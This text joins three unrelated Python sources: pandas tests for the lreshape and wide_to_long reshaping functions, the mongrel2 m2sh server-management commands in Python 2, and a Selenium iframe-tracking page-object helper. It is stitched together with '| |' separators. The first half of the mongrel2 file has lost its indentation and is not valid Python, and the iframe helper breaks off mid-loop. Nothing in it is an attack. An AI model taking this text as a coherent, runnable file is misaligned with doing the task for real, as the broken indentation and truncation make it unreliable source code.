                             '29dec2008', '20jan2009'],
                'visitdt2':
                ['21jan2009', nan, '22jan2009', '31dec2008', '03feb2009'],
                'visitdt3': ['05feb2009', nan, nan, '02jan2009', '15feb2009'],
                'wt1': [1823, 3338, 1549, 3298, 4306],
                'wt2': [2011.0, nan, 1892.0, 3338.0, 4575.0],
                'wt3': [2293.0, nan, nan, 3377.0, 4805.0]}
        df = DataFrame(data)
        spec = {'visitdt': ['visitdt%d' % i for i in range(1, 4)],
                'wt': ['wt%d' % i for i in range(1, 4)]}
        # default dropna=True: rows where a melted group is all-NaN are dropped
        result = lreshape(df, spec)
        exp_data = {'birthdt':
                    ['08jan2009', '20dec2008', '30dec2008', '21dec2008',
                     '11jan2009', '08jan2009', '30dec2008', '21dec2008',
                     '11jan2009', '08jan2009', '21dec2008', '11jan2009'],
                    'birthwt': [1766, 3301, 1454, 3139, 4133, 1766, 1454, 3139,
                                4133, 1766, 3139, 4133],
                    'id': [101, 102, 103, 104, 105, 101, 103, 104, 105, 101,
                           104, 105],
                    'sex': ['Male', 'Female', 'Female', 'Female', 'Female',
                            'Male', 'Female', 'Female', 'Female', 'Male',
                            'Female', 'Female'],
                    'visitdt': ['11jan2009', '22dec2008', '04jan2009',
                                '29dec2008', '20jan2009', '21jan2009',
                                '22jan2009', '31dec2008', '03feb2009',
                                '05feb2009', '02jan2009', '15feb2009'],
                    'wt': [1823.0, 3338.0, 1549.0, 3298.0, 4306.0, 2011.0,
                           1892.0, 3338.0, 4575.0, 2293.0, 3377.0, 4805.0]}
        exp = DataFrame(exp_data, columns=result.columns)
        tm.assert_frame_equal(result, exp)
        # dropna=False keeps every id for every period, NaNs included
        result = lreshape(df, spec, dropna=False)
        exp_data = {'birthdt':
                    ['08jan2009', '20dec2008', '30dec2008', '21dec2008',
                     '11jan2009', '08jan2009', '20dec2008', '30dec2008',
                     '21dec2008', '11jan2009', '08jan2009', '20dec2008',
                     '30dec2008', '21dec2008', '11jan2009'],
                    'birthwt': [1766, 3301, 1454, 3139, 4133, 1766, 3301, 1454,
                                3139, 4133, 1766, 3301, 1454, 3139, 4133],
                    'id': [101, 102, 103, 104, 105, 101, 102, 103, 104, 105,
                           101, 102, 103, 104, 105],
                    'sex': ['Male', 'Female', 'Female', 'Female', 'Female',
                            'Male', 'Female', 'Female', 'Female', 'Female',
                            'Male', 'Female', 'Female', 'Female', 'Female'],
                    'visitdt': ['11jan2009', '22dec2008', '04jan2009',
                                '29dec2008', '20jan2009', '21jan2009', nan,
                                '22jan2009', '31dec2008', '03feb2009',
                                '05feb2009', nan, nan, '02jan2009',
                                '15feb2009'],
                    'wt': [1823.0, 3338.0, 1549.0, 3298.0, 4306.0, 2011.0, nan,
                           1892.0, 3338.0, 4575.0, 2293.0, nan, nan, 3377.0,
                           4805.0]}
        exp = DataFrame(exp_data, columns=result.columns)
        tm.assert_frame_equal(result, exp)
        # groups of unequal length in the spec must raise
        spec = {'visitdt': ['visitdt%d' % i for i in range(1, 3)],
                'wt': ['wt%d' % i for i in range(1, 4)]}
        pytest.raises(ValueError, lreshape, df, spec)
class TestWideToLong(object):
    """Tests for wide_to_long: stub-name matching, separators, suffix
    handling, multiple id columns, and failure modes."""
    def test_simple(self):
        np.random.seed(123)
        x = np.random.randn(3)
        df = pd.DataFrame({"A1970": {0: "a",
                                     1: "b",
                                     2: "c"},
                           "A1980": {0: "d",
                                     1: "e",
                                     2: "f"},
                           "B1970": {0: 2.5,
                                     1: 1.2,
                                     2: .7},
                           "B1980": {0: 3.2,
                                     1: 1.3,
                                     2: .1},
                           "X": dict(zip(
                               range(3), x))})
        df["id"] = df.index
        exp_data = {"X": x.tolist() + x.tolist(),
                    "A": ['a', 'b', 'c', 'd', 'e', 'f'],
                    "B": [2.5, 1.2, 0.7, 3.2, 1.3, 0.1],
                    "year": ['1970', '1970', '1970', '1980', '1980', '1980'],
                    "id": [0, 1, 2, 0, 1, 2]}
        exp_frame = DataFrame(exp_data)
        exp_frame = exp_frame.set_index(['id', 'year'])[["X", "A", "B"]]
        long_frame = wide_to_long(df, ["A", "B"], i="id", j="year")
        tm.assert_frame_equal(long_frame, exp_frame)
    def test_stubs(self):
        # GH9204: wide_to_long must not mutate the caller's stubs list
        df = pd.DataFrame([[0, 1, 2, 3, 8], [4, 5, 6, 7, 9]])
        df.columns = ['id', 'inc1', 'inc2', 'edu1', 'edu2']
        stubs = ['inc', 'edu']
        # TODO: unused?
        df_long = pd.wide_to_long(df, stubs, i='id', j='age')  # noqa
        assert stubs == ['inc', 'edu']
    def test_separating_character(self):
        # GH14779
        np.random.seed(123)
        x = np.random.randn(3)
        df = pd.DataFrame({"A.1970": {0: "a",
                                      1: "b",
                                      2: "c"},
                           "A.1980": {0: "d",
                                      1: "e",
                                      2: "f"},
                           "B.1970": {0: 2.5,
                                      1: 1.2,
                                      2: .7},
                           "B.1980": {0: 3.2,
                                      1: 1.3,
                                      2: .1},
                           "X": dict(zip(
                               range(3), x))})
        df["id"] = df.index
        exp_data = {"X": x.tolist() + x.tolist(),
                    "A": ['a', 'b', 'c', 'd', 'e', 'f'],
                    "B": [2.5, 1.2, 0.7, 3.2, 1.3, 0.1],
                    "year": ['1970', '1970', '1970', '1980', '1980', '1980'],
                    "id": [0, 1, 2, 0, 1, 2]}
        exp_frame = DataFrame(exp_data)
        exp_frame = exp_frame.set_index(['id', 'year'])[["X", "A", "B"]]
        long_frame = wide_to_long(df, ["A", "B"], i="id", j="year", sep=".")
        tm.assert_frame_equal(long_frame, exp_frame)
    def test_escapable_characters(self):
        # stub names containing regex metacharacters must be escaped
        np.random.seed(123)
        x = np.random.randn(3)
        df = pd.DataFrame({"A(quarterly)1970": {0: "a",
                                                1: "b",
                                                2: "c"},
                           "A(quarterly)1980": {0: "d",
                                                1: "e",
                                                2: "f"},
                           "B(quarterly)1970": {0: 2.5,
                                                1: 1.2,
                                                2: .7},
                           "B(quarterly)1980": {0: 3.2,
                                                1: 1.3,
                                                2: .1},
                           "X": dict(zip(
                               range(3), x))})
        df["id"] = df.index
        exp_data = {"X": x.tolist() + x.tolist(),
                    "A(quarterly)": ['a', 'b', 'c', 'd', 'e', 'f'],
                    "B(quarterly)": [2.5, 1.2, 0.7, 3.2, 1.3, 0.1],
                    "year": ['1970', '1970', '1970', '1980', '1980', '1980'],
                    "id": [0, 1, 2, 0, 1, 2]}
        exp_frame = DataFrame(exp_data)
        exp_frame = exp_frame.set_index(
            ['id', 'year'])[["X", "A(quarterly)", "B(quarterly)"]]
        long_frame = wide_to_long(df, ["A(quarterly)", "B(quarterly)"],
                                  i="id", j="year")
        tm.assert_frame_equal(long_frame, exp_frame)
    def test_unbalanced(self):
        # test that we can have a varying amount of time variables
        df = pd.DataFrame({'A2010': [1.0, 2.0],
                           'A2011': [3.0, 4.0],
                           'B2010': [5.0, 6.0],
                           'X': ['X1', 'X2']})
        df['id'] = df.index
        exp_data = {'X': ['X1', 'X1', 'X2', 'X2'],
                    'A': [1.0, 3.0, 2.0, 4.0],
                    'B': [5.0, np.nan, 6.0, np.nan],
                    'id': [0, 0, 1, 1],
                    'year': ['2010', '2011', '2010', '2011']}
        exp_frame = pd.DataFrame(exp_data)
        exp_frame = exp_frame.set_index(['id', 'year'])[["X", "A", "B"]]
        long_frame = wide_to_long(df, ['A', 'B'], i='id', j='year')
        tm.assert_frame_equal(long_frame, exp_frame)
    def test_character_overlap(self):
        # Test we handle overlapping characters in both id_vars and value_vars
        df = pd.DataFrame({
            'A11': ['a11', 'a22', 'a33'],
            'A12': ['a21', 'a22', 'a23'],
            'B11': ['b11', 'b12', 'b13'],
            'B12': ['b21', 'b22', 'b23'],
            'BB11': [1, 2, 3],
            'BB12': [4, 5, 6],
            'BBBX': [91, 92, 93],
            'BBBZ': [91, 92, 93]
        })
        df['id'] = df.index
        exp_frame = pd.DataFrame({
            'BBBX': [91, 92, 93, 91, 92, 93],
            'BBBZ': [91, 92, 93, 91, 92, 93],
            'A': ['a11', 'a22', 'a33', 'a21', 'a22', 'a23'],
            'B': ['b11', 'b12', 'b13', 'b21', 'b22', 'b23'],
            'BB': [1, 2, 3, 4, 5, 6],
            'id': [0, 1, 2, 0, 1, 2],
            'year': ['11', '11', '11', '12', '12', '12']})
        exp_frame = exp_frame.set_index(['id', 'year'])[
            ['BBBX', 'BBBZ', 'A', 'B', 'BB']]
        long_frame = wide_to_long(df, ['A', 'B', 'BB'], i='id', j='year')
        tm.assert_frame_equal(long_frame.sort_index(axis=1),
                              exp_frame.sort_index(axis=1))
    def test_invalid_separator(self):
        # if an invalid separator is supplied a empty data frame is returned
        sep = 'nope!'
        df = pd.DataFrame({'A2010': [1.0, 2.0],
                           'A2011': [3.0, 4.0],
                           'B2010': [5.0, 6.0],
                           'X': ['X1', 'X2']})
        df['id'] = df.index
        exp_data = {'X': '',
                    'A2010': [],
                    'A2011': [],
                    'B2010': [],
                    'id': [],
                    'year': [],
                    'A': [],
                    'B': []}
        exp_frame = pd.DataFrame(exp_data)
        exp_frame = exp_frame.set_index(['id', 'year'])[[
            'X', 'A2010', 'A2011', 'B2010', 'A', 'B']]
        exp_frame.index.set_levels([[0, 1], []], inplace=True)
        long_frame = wide_to_long(df, ['A', 'B'], i='id', j='year', sep=sep)
        tm.assert_frame_equal(long_frame.sort_index(axis=1),
                              exp_frame.sort_index(axis=1))
    def test_num_string_disambiguation(self):
        # Test that we can disambiguate number value_vars from
        # string value_vars
        df = pd.DataFrame({
            'A11': ['a11', 'a22', 'a33'],
            'A12': ['a21', 'a22', 'a23'],
            'B11': ['b11', 'b12', 'b13'],
            'B12': ['b21', 'b22', 'b23'],
            'BB11': [1, 2, 3],
            'BB12': [4, 5, 6],
            'Arating': [91, 92, 93],
            'Arating_old': [91, 92, 93]
        })
        df['id'] = df.index
        exp_frame = pd.DataFrame({
            'Arating': [91, 92, 93, 91, 92, 93],
            'Arating_old': [91, 92, 93, 91, 92, 93],
            'A': ['a11', 'a22', 'a33', 'a21', 'a22', 'a23'],
            'B': ['b11', 'b12', 'b13', 'b21', 'b22', 'b23'],
            'BB': [1, 2, 3, 4, 5, 6],
            'id': [0, 1, 2, 0, 1, 2],
            'year': ['11', '11', '11', '12', '12', '12']})
        exp_frame = exp_frame.set_index(['id', 'year'])[
            ['Arating', 'Arating_old', 'A', 'B', 'BB']]
        long_frame = wide_to_long(df, ['A', 'B', 'BB'], i='id', j='year')
        tm.assert_frame_equal(long_frame.sort_index(axis=1),
                              exp_frame.sort_index(axis=1))
    def test_invalid_suffixtype(self):
        # If all stubs names end with a string, but a numeric suffix is
        # assumed, an empty data frame is returned
        df = pd.DataFrame({'Aone': [1.0, 2.0],
                           'Atwo': [3.0, 4.0],
                           'Bone': [5.0, 6.0],
                           'X': ['X1', 'X2']})
        df['id'] = df.index
        exp_data = {'X': '',
                    'Aone': [],
                    'Atwo': [],
                    'Bone': [],
                    'id': [],
                    'year': [],
                    'A': [],
                    'B': []}
        exp_frame = pd.DataFrame(exp_data)
        exp_frame = exp_frame.set_index(['id', 'year'])[[
            'X', 'Aone', 'Atwo', 'Bone', 'A', 'B']]
        exp_frame.index.set_levels([[0, 1], []], inplace=True)
        long_frame = wide_to_long(df, ['A', 'B'], i='id', j='year')
        tm.assert_frame_equal(long_frame.sort_index(axis=1),
                              exp_frame.sort_index(axis=1))
    def test_multiple_id_columns(self):
        # Taken from http://www.ats.ucla.edu/stat/stata/modules/reshapel.htm
        df = pd.DataFrame({
            'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],
            'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],
            'ht1': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],
            'ht2': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]
        })
        exp_frame = pd.DataFrame({
            'ht': [2.8, 3.4, 2.9, 3.8, 2.2, 2.9, 2.0, 3.2, 1.8,
                   2.8, 1.9, 2.4, 2.2, 3.3, 2.3, 3.4, 2.1, 2.9],
            'famid': [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3],
            'birth': [1, 1, 2, 2, 3, 3, 1, 1, 2, 2, 3, 3, 1, 1, 2, 2, 3, 3],
            'age': ['1', '2', '1', '2', '1', '2', '1', '2', '1',
                    '2', '1', '2', '1', '2', '1', '2', '1', '2']
        })
        exp_frame = exp_frame.set_index(['famid', 'birth', 'age'])[['ht']]
        long_frame = wide_to_long(df, 'ht', i=['famid', 'birth'], j='age')
        tm.assert_frame_equal(long_frame, exp_frame)
    def test_non_unique_idvars(self):
        # GH16382
        # Raise an error message if non unique id vars (i) are passed
        df = pd.DataFrame({
            'A_A1': [1, 2, 3, 4, 5],
            'B_B1': [1, 2, 3, 4, 5],
            'x': [1, 1, 1, 1, 1]
        })
        with pytest.raises(ValueError):
            wide_to_long(df, ['A_A', 'B_B'], i='x', j='colname')
| |
from mongrel2 import config
from mongrel2.config import args
import mongrel2.config.commands
from uuid import uuid4
from mongrel2.config import model
import getpass
import sys
import os
import signal
from sqlite3 import OperationalError
def try_reading(reader):
try:
cmd = reader.readline()
return cmd.split(' ')
except UnicodeDecodeError:
print "\nERROR: Sorry, PyRepl and Python hate printing to your screen: UnicodeDecodeError."
return []
def shell_command():
"""
Starts an interactive shell with readline style input so you can
work with Mongrel2 easier.
"""
try:
from pyrepl.unix_console import UnixConsole
from pyrepl.historical_reader import HistoricalReader
except:
print "You don't have PyRepl installed, shell not available."
reader = HistoricalReader(UnixConsole())
reader.ps1 = "m2> "
reader.ps2 = "..> "
reader.ps3 = "...> "
reader.ps4 = "....> "
try:
while True:
cmd = try_reading(reader)
if cmd:
try:
args.parse_and_run_command(cmd, mongrel2.config.commands)
except Exception, e:
print "ERROR:", e
except EOFError:
print "Bye."
except KeyboardInterrupt:
print "BYE!"
def help_command(**options):
"""
Prints out help for the commands.
m2sh help
You can get help for one command with:
m2sh help -for STR
"""
if "for" in options:
help_text = args.help_for_command(config.commands, options['for'])
if help_text:
print help_text
else:
args.invalid_command_message(config.commands)
else:
print "Available commands:\n"
print "\n".join(args.available_commands(config.commands))
print "\nUse config help -for <command> to find out more."
def dump_command(db=None):
"""
Simple dump of a config database:
m2sh dump -db config.sqlite
"""
print "LOADING DB: ", db
try:
if not (os.path.isfile(db) and os.access(db, os.R_OK)):
raise IOError
store = model.begin(db)
servers = store.find(model.Server)
for server in servers:
print server
for host in server.hosts:
print "\t", host
for route in host.routes:
print "\t\t", route
except IOError:
print "%s not readable" % db
except OperationalError, exc:
print "SQLite error: %s" % exc
def uuid_command(hex=False):
"""
Generates a UUID for you to use in your configurations:
m2sh uuid
m2sh uuid -hex
The -hex means to print it as a big hex number, which is
more efficient but harder to read.
"""
if hex:
print uuid4().hex
else:
print str(uuid4())
def servers_command(db=None):
"""
Lists the servers that are configured in this setup:
m2sh servers -db config.sqlite
"""
if not os.path.isfile(db):
print "ERROR: Cannot access database file %s" % db
return
try:
store = model.begin(db)
servers = store.find(model.Server)
for server in servers:
print "-------"
print server.name, server.default_host, server.uuid
for host in server.hosts:
print "\t", host.id, ':', host.name
except OperationalError, exc:
print "SQLite error: %s" % exc
def hosts_command(db=None, uuid="", host="", name=""):
    """
    List all the hosts in the given server identified by UUID or host.

    m2sh hosts -db config.sqlite -uuid f400bf85-4538-4f7a-8908-67e313d515c2
    m2sh hosts -db config.sqlite -host localhost
    m2sh hosts -db config.sqlite -name test

    The -host parameter is the default_host for the server.
    """
    if not (os.path.isfile(db) and os.access(db, os.R_OK)):
        print "Cannot read database file %s" % db
        return
    try:
        store = model.begin(db)
        results = None
        # exactly one selector is honored, priority: uuid > host > name
        if uuid:
            results = store.find(model.Server, model.Server.uuid == unicode(uuid))
        elif host:
            results = store.find(model.Server, model.Server.default_host == unicode(host))
        elif name:
            results = store.find(model.Server, model.Server.name == unicode(name))
        else:
            print "ERROR: Must give a -host or -uuid or -name."
            return
        if results.count():
            # only the first matching server is listed
            server = results[0]
            hosts = store.find(model.Host, model.Host.server_id == server.id)
            for host in hosts:
                print "--------"
                print host, ":"
                for route in host.routes:
                    print "\t", route.path, ':', route.target
        else:
            print "No servers found."
    except OperationalError, exc:
        print "SQLite error: %s" % exc
def init_command(db=None):
    """
    Initializes a new config database.

    m2sh init -db config.sqlite

    It will obliterate this config.
    """
    from pkg_resources import resource_stream
    import sqlite3
    # the schema ships inside the mongrel2 package
    sql = resource_stream('mongrel2', 'sql/config.sql').read()
    # close any open store so sqlite can recreate the file cleanly
    if model.store:
        model.store.close()
        model.store = None
    if os.path.isfile(db) and not os.access(db, os.W_OK):
        print "Cannot access database file %s" % db
        return
    try:
        conn = sqlite3.connect(db)
        conn.executescript(sql)
        # record the init in the commit log for other admins
        commit_command(db=db, what="init_command", why=" ".join(sys.argv))
    except OperationalError, exc:
        print "Error: %s" % exc
def load_command(db=None, config=None, clear=True):
    """
    After using init you can use this to load a config:

    m2sh load -db config.sqlite -config tests/sample_conf.py

    This will erase the previous config, but we'll make it
    safer later on.
    """
    import imp
    if not (os.path.isfile(db) and os.access(db, os.R_OK)):
        print "Cannot access database file %s" % db
        return
    try:
        model.begin(db, clear=clear)
        # executing the user's config file populates the open store
        imp.load_source('mongrel2_config_main', config)
        commit_command(db=db, what="load_command", why=" ".join(sys.argv))
    except OperationalError, exc:
        print "SQLite error: %s" % exc
    except SyntaxError,exc:
        # config is arbitrary Python; report its syntax errors cleanly
        print "Syntax error: %s" % exc
def config_command(db=None, config=None, clear=True):
    """
    Effectively does an init then load of a config to get
    you started quicker:

    m2sh config -db config.sqlite -config tests/sample_conf.py

    Like the other two, this will nuke your config, but we'll
    make it safer later.
    """
    # simple composition of the two commands above
    init_command(db=db)
    load_command(db=db, config=config, clear=clear)
def commit_command(db=None, what=None, why=None):
    """
    Used to add a commit event to the database for other admins to know
    what is going on with the config.  The system logs quite a lot
    already for you, like your username, machine name, etc:

    m2sh commit -db test.sqlite -what mongrel2.org \
        -why "Needed to change paters."

    In future versions it will prevent you from committing as root,
    because only assholes commit from root.

    Both parameters are arbitrary, but I like to record what I did to
    different Hosts in servers.
    """
    import socket
    store = model.load_db("sqlite:" + db)
    who = unicode(getpass.getuser())
    # currently only shames root commits; it does not block them
    if who == u'root':
        print "Commit from root eh? Man, you're kind of a tool."
    log = model.Log()
    log.who = who
    log.what = unicode(what)
    log.why = unicode(why)
    log.location = unicode(socket.gethostname())
    log.how = u'm2sh'
    store.add(log)
    store.commit()
def log_command(db=None, count=20):
    """
    Dumps commit logs:

    m2sh log -db test.sqlite -count 20
    m2sh log -db test.sqlite

    So you know who to blame.
    """
    store = model.load_db("sqlite:" + db)
    logs = store.find(model.Log)
    # ordered by timestamp, limited to the first 'count' entries
    for log in logs.order_by(model.Log.happened_at)[0:count]:
        print log
def find_servers(db=None, uuid="", host="", name="", every=False):
    """
    Finds all the servers which match the given uuid, host or name.
    If every is true all servers in the database will be returned.
    """
    store = model.begin(db)
    servers = []
    # selector priority: every > uuid > host > name
    if every:
        servers = store.find(model.Server)
    elif uuid:
        servers = store.find(model.Server, model.Server.uuid == unicode(uuid))
    elif host:
        servers = store.find(model.Server, model.Server.default_host == unicode(host))
    elif name:
        servers = store.find(model.Server, model.Server.name == unicode(name))
    # NOTE(review): if no selector is given, servers stays a plain list and
    # list.count() below raises TypeError -- verify callers always pass one
    # refuse to guess when more than one server matches a selector
    if servers.count() > 1 and not every:
        print "Not sure which server to run, what I found:"
        print "NAME HOST UUID"
        print "--------------"
        for server in servers:
            print server.name, server.default_host, server.uuid
        print "* Use -every to run them all."
        return []
    else:
        return servers
def start_command(db=None, uuid= "", host="", name="", sudo=False, every=False):
    """
    Does a simple start of the given server(s) identified by the uuid, host
    (default_host) parameter or the name.:

    m2sh start -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
    m2sh start -db config.sqlite -host localhost
    m2sh start -db config.sqlite -name test
    m2sh start -db config.sqlite -every

    Give the -sudo options if you want it to start mongrel2 as root for you
    (must have sudo installed).

    Give the -every option if you want mongrel2 to launch all servers listed in
    the given db.

    If multiple servers match and -every is not given, m2sh will ask you which
    to start.
    """
    # optional 'sudo' prefix for the shell command
    root_enabler = 'sudo' if sudo else ''
    servers = find_servers(db, uuid, host, name, every)
    if not servers or servers.count() == 0:
        print 'No matching servers found, nothing launched'
    else:
        for server in servers:
            print 'Launching server %s %s on port %d' % (server.name, server.uuid, server.port)
            # NOTE(review): db path and uuid are interpolated into a shell
            # command unquoted -- fine for trusted local configs, but worth
            # confirming no untrusted values can reach here
            os.system('%s mongrel2 %s %s' % (root_enabler, db, server.uuid))
def stop_command(db=None, uuid="", host="", name="", every=False, murder=False):
    """
    Stops a running mongrel2 process according to the host, either
    gracefully (INT) or murderous (TERM):

    m2sh stop -db config.sqlite -host localhost
    m2sh stop -db config.sqlite -host localhost -murder
    m2sh stop -db config.sqlite -name test -murder
    m2sh stop -db config.sqlite -every

    You shouldn't need sudo to stop a running mongrel if you
    are also the user that owns the chroot directory or root.

    Normally mongrel2 will wait until connections die off before really
    leaving, but you can give it the -murder flag and it'll nuke it
    semi-gracefully.  You can also do it again with -murder if it's waiting
    for some dead connections and you want it to just quit.
    """
    for server in find_servers(db, uuid, host, name, every):
        pid = get_server_pid(server)
        if pid:
            # SIGINT lets mongrel2 drain connections; SIGTERM kills it
            sig = signal.SIGTERM if murder else signal.SIGINT
            os.kill(pid, sig)
def reload_command(db=None, uuid="", host="", name="", every=False):
    """
    Causes Mongrel2 to do a soft-reload which will re-read the config
    database and then attempt to load a whole new configuration without
    losing connections on the previous one:

    m2sh reload -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
    m2sh reload -db config.sqlite -host localhost
    m2sh reload -db config.sqlite -name test
    m2sh reload -db config.sqlite -every

    This reload will need access to the config database from within the
    chroot for it to work, and it's not totally guaranteed to be 100%
    reliable, but if you are doing development and need to do quick changes
    then this is what you do.
    """
    for server in find_servers(db, uuid, host, name, every):
        pid = get_server_pid(server)
        if pid:
            # SIGHUP is mongrel2's soft-reload signal
            os.kill(pid, signal.SIGHUP)
def running_command(db=None, uuid="", host="", name="", every=False):
    """
    Tells you if the given server is still running:

    m2sh running -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
    m2sh running -db config.sqlite -host localhost
    m2sh running -db config.sqlite -name test
    m2sh running -db config.sqlite -every
    """
    for server in find_servers(db, uuid, host, name, every):
        pid = get_server_pid(server)
        # TODO: Clean this up.
        if pid:
            try:
                # signal 0 only probes whether the process exists
                os.kill(pid, 0)
                print "Found server %s %s RUNNING at PID %i" % (server.name,
                                                                server.uuid,
                                                                pid)
            except OSError:
                # stale pid file: process is gone
                print "Server %s %s NOT RUNNING at PID %i" % (server.name,
                                                              server.uuid,
                                                              pid)
def control_command(db=None, host="", name="", uuid=""):
    """
    Start a simple control console for working with mongrel2.
    This is *very* bare bones at the moment but should improve.

    m2sh control -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
    m2sh control -db config.sqlite -host localhost
    m2sh control -db config.sqlite -name test
    """
    store = model.load_db("sqlite:" + db)
    import zmq
    servers = find_servers(db, uuid, host, name, False)
    if servers:
        server = servers[0]
        CTX = zmq.Context()
        results = store.find(model.Setting, model.Setting.key == unicode("control_port"))
        # NOTE(review): 'count() > 1' ignores the case of exactly one
        # configured control_port and falls back to the default address;
        # looks like it should be >= 1 -- confirm before changing
        addr = results[0].value if results.count() > 1 else "ipc://run/control"
        ctl = CTX.socket(zmq.REQ)
        print "CONNECTING to: %s in %s" % (addr, server.chroot)
        # the ipc:// address is relative to the server's chroot
        os.chdir(server.chroot)
        ctl.connect(addr)
        try:
            # simple REQ/REP loop: send a line, print the reply
            while True:
                cmd = raw_input("> ")
                ctl.send(cmd)
                print ctl.recv()
        except EOFError:
            ctl.close()
def get_server_pid(server):
    """Return the server's PID from its pid file, or None if missing."""
    # the pid file path is relative to the server's chroot
    pid_file = os.path.realpath(server.chroot + server.pid_file)
    if not os.path.isfile(pid_file):
        print "PID file %s not found for server %s %s" % (pid_file,
                                                          server.name,
                                                          server.uuid)
        return None
    else:
        # file handle is not closed explicitly; acceptable for a
        # short-lived CLI under CPython's refcounting
        return int(open(pid_file, 'r').read())
def version_command():
    """
    Prints out the version of your mongrel2 binary.
    """
    print "Mongrel2/1.7.5"
| |
import random
import string
# iframe_locators - all iframes that need to be traversed
# to get to this object
# iframe_locator_ids - keys into the obj's owner's locatordict for iframes
# current_framelevel - index of the current iframe in iframe_locators
class IframeTracker(object):
    """Track the chain of iframes needed to reach a page object and wrap
    the object's callables and properties so each access first switches
    the browser into the correct iframe context.

    iframe_locators    -- locators for each iframe on the path to the object
    iframe_locator_ids -- keys into the obj's owner's locator dict
    current_framelevel -- index of the current iframe in iframe_locators,
                          counted backwards (0 is the top-level browser
                          context, negative values are nested iframes)
    """
    def __init__(self,obj):
        self.obj = obj
        self.iframe_locators = []
        self.iframe_locator_ids = []
        self.current_framelevel = 0

    def add_iframe(self,framelocid):
        """Resolve framelocid through the owner's locator dict and record it.

        Ids that resolve to None are silently skipped."""
        iframeloc = self.obj.owner.locators[framelocid]
        if iframeloc is not None:
            self.iframe_locators.append(iframeloc)
            self.iframe_locator_ids.append(framelocid)

    def update_iframe_locators(self):
        """Re-resolve all stored locator ids (e.g. after the owner's
        locator dict changed)."""
        iframelocids = self.iframe_locator_ids
        self.iframe_locators = []
        self.iframe_locator_ids = []
        for framelocid in iframelocids:
            self.add_iframe(framelocid)

    def wrap_new_object(self,obj):
        """Wrap obj and, transitively, all of its child widgets."""
        objlist = [obj]
        for o in objlist:
            o.logger.debug('wrapping %s' % (o.__class__.__name__))
            o.iframe_tracker = self
            self.wrap_callable_attributes(o)
            self.wrap_property_attributes(o)
            # appending while iterating extends the traversal to children
            objlist.extend(o.widgets)

    def wrap_callable_attributes(self,o):
        """wrap callable attributes of the object.

        traverse the object's class and base classes to find
        callable attributes to wrap.

        avoid wrapping __init__() methods and "noiframe" methods
        that were predetermined not to be affected by iframes.
        """
        clslist = [o.__class__]
        for cls in clslist:
            if cls.__name__ == 'object':
                continue
            dct = cls.__dict__
            for attr, item in dct.items():
                if attr != '__init__' and callable(item):
                    if attr in o.noiframe:
                        # skip attributes that are specifically
                        # noted not to need an iframe context change
                        # as listed in the noiframe list
                        self.obj.logger.debug('skipping function: %s' % (attr))
                        continue
                    # fetch the bound method, then shadow it on the
                    # instance with the context-switching wrapper
                    item = getattr(o,attr)
                    setattr(o,attr,self.wrap_attribute(item))
                    self.obj.logger.debug('wrapping function: %s' % (attr))
            # appending while iterating walks the whole base-class chain
            clslist.extend(cls.__bases__)

    def wrap_property_attributes(self,o):
        """wrap property attributes of the object.

        to do this, we first create a new class object that we can
        freely manipulate, by copying the base classes and attribute
        dictionary from the original page object class.  next we search
        the new class for property attributes.

        currently we only wrap the properties of the object's class.
        properties of the object's base clases are ignored for now.

        i believe the act of accessing the property ends up executing
        the property's getter or setter methods, which will fail if
        you are not on the page and in the correct context hosting
        the object.  Or perhaps the property information is associated
        with a class object, so changing the class object changes how
        all newly instantiated objects will work.
        """
        # random suffix keeps each generated class name unique
        randtxt = ''.join([random.choice(string.ascii_lowercase) \
                           for i in range(5)])
        clsname = "IframeWrap_" + randtxt + "_" + o.__class__.__name__
        self.obj.logger.debug('creating new class \'%s\' from \'%s\'' \
                              % (clsname,o.__class__.__name__))
        cls = type(clsname,
                   o.__class__.__bases__,
                   dict(o.__class__.__dict__))
        o.__class__ = cls
        dct = cls.__dict__
        for attr, item in dct.items():
            if isinstance(item,property):
                if attr in o.noiframe:
                    # skip attributes that are specifically
                    # noted not to need an iframe context change
                    # as listed in the noiframe list
                    self.obj.logger.debug('skipping property: %s' % (attr))
                    continue
                # NOTE(review): the deleter argument is item.__delattr__,
                # not item.__delete__ -- looks suspicious; confirm that
                # property deletion still behaves as intended
                new_property = property(self.wrap_attribute(item.__get__),
                                        self.wrap_attribute(item.__set__),
                                        item.__delattr__)
                setattr(cls,attr,new_property)
                self.obj.logger.debug('wrapping property: %s' % (attr))

    def wrap_attribute(self,f):
        """Return a wrapper that descends into this tracker's innermost
        iframe, calls f, then restores the previous frame level."""
        def _wrapper(*args, **kwds):
            self.obj.logger.debug('Entering wrapper function for %s' \
                                  % (f.__name__))
            # count our framelevels backwards
            # think of framelevel 0 as the browser context
            initial_framelevel = self.current_framelevel
            final_framelevel = -1 * len(self.iframe_locators)
            self.obj.logger.debug('starting frame level: %s' \
                                  % (self.current_framelevel))
            switched = self._switch_to_iframe_context(final_framelevel)
            # make sure we return to the previous context if an exception is
            # raised. exceptions are often raised when using find_element
            # based functions or waiting for elements to appear or diappear.
            # this try/final block helps ensure we don't lose track of our
            # frame level when exceptions occur.
            r = None
            try:
                # call the function
                self.obj.logger.debug('current frame level: %s in %s' \
                                      % (self.current_framelevel, self.iframe_locators))
                self.obj.logger.debug('calling function: %s' % f.__name__)
                r = f(*args, **kwds)
            finally:
                # exit the frame
                if switched:
                    self._switch_to_iframe_context(initial_framelevel)
                self.obj.logger.debug('ending frame level = %s' \
                                      % (self.current_framelevel))
                self.obj.logger.debug('Exiting wrapper function for %s' \
                                      % (f.__name__))
            return r
        return _wrapper

    def _switch_to_iframe_context(self,framelevel):
        """Move the browser to the given (non-positive) frame level.

        Returns True if any context switch actually happened."""
        switched_frames = False
        # moving to a shallower level requires restarting from the
        # top-level document and descending again
        if framelevel > self.current_framelevel:
            self.obj.logger.debug('-> switching to default context')
            self.obj._browser.switch_to_default_content()
            self.current_framelevel = 0
            switched_frames = True
        while self.current_framelevel > framelevel:
            next_framelevel = self.current_framelevel - 1
